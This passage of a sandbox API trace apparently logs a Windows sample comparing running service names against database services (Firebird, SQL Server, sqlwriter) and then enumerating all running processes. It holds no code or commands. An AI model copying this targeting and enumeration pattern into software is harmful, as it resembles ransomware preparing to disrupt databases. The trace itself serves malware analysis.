lpString2="netprofm") returned -1 [0189.639] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0189.639] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0189.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0189.639] lstrlenW (lpString="NlaSvc") returned 6 [0189.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0189.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0189.639] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0189.639] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0189.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0189.639] lstrlenW (lpString="nsi") returned 3 [0189.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0189.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0189.639] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0189.639] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0189.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0189.639] lstrlenW (lpString="PcaSvc") returned 6 [0189.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0189.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0189.639] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0189.639] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0189.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0189.639] lstrlenW (lpString="PlugPlay") returned 8 [0189.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0189.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0189.639] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0189.639] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0189.639] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0189.639] lstrlenW (lpString="Power") returned 5 [0189.639] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0189.639] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0189.639] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0189.639] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0189.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0189.640] lstrlenW (lpString="ProfSvc") returned 7 [0189.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0189.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0189.640] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0189.640] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0189.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0189.640] lstrlenW (lpString="RpcEptMapper") returned 12 [0189.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0189.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0189.640] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0189.640] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0189.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0189.640] lstrlenW (lpString="RpcSs") returned 5 [0189.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0189.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0189.640] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0189.640] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0189.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0189.640] lstrlenW (lpString="SamSs") returned 5 [0189.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0189.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0189.640] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0189.640] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0189.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0189.640] lstrlenW (lpString="Schedule") returned 8 [0189.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0189.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0189.640] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0189.640] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0189.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0189.640] lstrlenW (lpString="SecurityHealthService") returned 21 [0189.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0189.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0189.641] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0189.641] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0189.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0189.641] lstrlenW (lpString="SENS") returned 4 [0189.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0189.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0189.641] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0189.641] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0189.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0189.641] lstrlenW (lpString="ShellHWDetection") returned 16 [0189.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0189.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0189.641] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0189.641] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0189.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0189.641] lstrlenW (lpString="Spooler") returned 7 [0189.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0189.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0189.641] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0189.641] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0189.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0189.641] lstrlenW (lpString="sppsvc") returned 6 [0189.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0189.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0189.641] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0189.641] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0189.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0189.641] lstrlenW (lpString="SSDPSRV") returned 7 [0189.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0189.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0189.641] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0189.641] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0189.642] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x334 [0189.647] Process32FirstW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.648] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0189.648] lstrlenW (lpString="System") returned 6 [0189.648] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0189.649] lstrlenW (lpString="smss.exe") returned 8 [0189.649] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.650] lstrlenW (lpString="csrss.exe") returned 9 [0189.650] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0189.651] lstrlenW (lpString="wininit.exe") returned 11 [0189.651] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.651] lstrlenW (lpString="csrss.exe") returned 9 [0189.651] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0189.652] lstrlenW (lpString="winlogon.exe") returned 12 [0189.652] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0189.653] lstrlenW (lpString="services.exe") returned 12 [0189.653] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0189.653] lstrlenW (lpString="lsass.exe") returned 9 [0189.653] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.654] lstrlenW (lpString="svchost.exe") returned 11 [0189.654] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0189.654] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0189.655] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0189.655] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0189.655] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.656] lstrlenW (lpString="svchost.exe") returned 11 [0189.656] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0189.657] lstrlenW (lpString="dwm.exe") returned 7 [0189.657] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.657] lstrlenW (lpString="svchost.exe") returned 11 [0189.657] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.658] lstrlenW (lpString="svchost.exe") returned 11 [0189.658] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.658] lstrlenW (lpString="svchost.exe") returned 11 [0189.658] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.659] lstrlenW (lpString="svchost.exe") returned 11 [0189.659] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.660] lstrlenW (lpString="svchost.exe") returned 11 [0189.660] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.660] lstrlenW (lpString="svchost.exe") returned 11 [0189.660] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.661] lstrlenW (lpString="svchost.exe") returned 11 [0189.661] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.662] lstrlenW (lpString="svchost.exe") returned 11 [0189.662] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.662] lstrlenW (lpString="svchost.exe") returned 11 [0189.662] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0189.663] lstrlenW (lpString="spoolsv.exe") returned 11 [0189.663] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.664] lstrlenW (lpString="svchost.exe") returned 11 [0189.664] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.665] lstrlenW (lpString="svchost.exe") returned 11 [0189.665] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0189.665] lstrlenW (lpString="audiodg.exe") returned 11 [0189.665] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0189.666] lstrlenW (lpString="sihost.exe") returned 10 [0189.666] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.667] lstrlenW (lpString="svchost.exe") returned 11 [0189.667] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0189.667] lstrlenW (lpString="taskhostw.exe") returned 13 [0189.667] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0189.668] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0189.668] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0189.669] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0189.669] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.669] lstrlenW (lpString="explorer.exe") returned 12 [0189.669] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0189.670] lstrlenW (lpString="Memory Compression") returned 18 [0189.670] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0189.671] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0189.671] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0189.671] lstrlenW (lpString="SearchUI.exe") returned 12 [0189.671] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0189.672] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0189.672] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.673] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0189.673] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0189.674] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0189.674] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0189.674] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0189.675] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0189.676] lstrlenW (lpString="conhost.exe") returned 11 [0189.676] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0189.676] lstrlenW (lpString="roof competitive.exe") returned 20 [0189.676] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0189.677] lstrlenW (lpString="trustees.exe") returned 12 [0189.677] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0189.678] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0189.678] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0189.678] lstrlenW (lpString="isbn.exe") returned 8 [0189.678] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0189.679] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0189.679] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0189.680] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0189.680] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0189.680] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0189.680] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0189.681] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0189.681] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0189.682] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0189.682] Process32NextW (in: hSnapshot=0x334, lppe=0x19dbb0 | out: lppe=0x19dbb0*(dwSize=0x22c, 